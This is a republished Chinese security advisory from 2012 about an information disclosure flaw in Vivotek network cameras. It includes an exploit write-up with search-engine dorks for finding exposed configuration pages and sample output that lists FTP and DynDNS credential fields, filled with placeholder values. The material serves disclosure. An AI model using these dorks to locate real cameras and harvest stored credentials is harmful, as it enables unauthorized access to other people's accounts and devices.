Vivotek网络摄像机信息泄露漏洞

发布日期:2012-07-16
更新日期:2012-07-17

受影响系统:
Vivotek Vivotek Network Cameras
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 54476

Vivotek是网络视频解决方案提供商。

Vivotek Network Camera在实现上存在信息泄露漏洞,成功利用后可允许远程攻击者访问敏感信息。

<*来源:GothicX
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

GothicX ()提供了如下测试方法:


Exploit Title: Vivotek Full Data Source CONFIG
# Date: 09/07/12
# Author: Alejandro Leon Morales  [GothicX]
# Author Mail: Gothicx[at]freaknetwork[dot]in
# Author Web:
# Sofware web:
# Vulnerable version: all
# Tested on:  Microsoft windows 7 / Vista / XP/ MacOS
# Dork:    "/setup/config.html"  ||allinurl:"setup/parafile.html"


[PoC]
 


[INFO SENSIBLE]

ACCOUNT FTP
ACCOUNT DYNDNS

[Result]

ddns_enable='1'
ddns_provider='DyndnsDynamic'
ddns_Safe100_hostname=''
ddns_Safe100_usernameemail=''
ddns_Safe100_passwordkey=''
ddns_DyndnsDynamic_hostname='hostname'
ddns_DyndnsDynamic_usernameemail='usernameemail'
ddns_DyndnsDynamic_passwordkey='passwordkey'
ddns_DyndnsCustom_hostname=''
ddns_DyndnsCustom_usernameemail=''
ddns_DyndnsCustom_passwordkey=''
ddns_TZO_hostname=''
ddns_TZO_usernameemail=''
ddns_TZO_passwordkey=''
ddns_DHS_hostname=''
ddns_DHS_usernameemail=''
ddns_DHS_passwordkey=''
ddns_DynInterfree_hostname=''
ddns_DynInterfree_usernameemail=''
ddns_DynInterfree_passwordkey=''
ddns_CustomSafe100_hostname=''
ddns_CustomSafe100_usernameemail=''
ddns_CustomSafe100_passwordkey=''
ddns_CustomSafe100_servername=''
server_i0_type='ftp'
server_i0_http_url='http://'
server_i0_http_username=''
server_i0_http_passwd=''
server_i0_ftp_address='FTPADDRESS'
server_i0_ftp_username='FTPUSERNAME'
server_i0_ftp_passwd='FTPPASSWD'
server_i0_ftp_port='21'
server_i0_ftp_passive='1'
server_i0_ftp_location='\\temp\\record'
----------------------------------------------------------------------------------------------------


[Sensitive data]

FTP ACCOUNTS:  server_i0_ftp_address='FTPADDRESS'
                                 server_i0_ftp_username='FTPUSERNAME'
                                 server_i0_ftp_passwd='FTPPASSWD'

DYNDNS ACCOUNTS: ddns_DyndnsDynamic_hostname='hostname'
                                         ddns_DyndnsDynamic_usernameemail='usernameemail'
                                         ddns_DyndnsDynamic_passwordkey='passwordkey'


//*************************************************************************************//

建议:
--------------------------------------------------------------------------------
厂商补丁:

Vivotek
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

:17151/

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwyzfx.html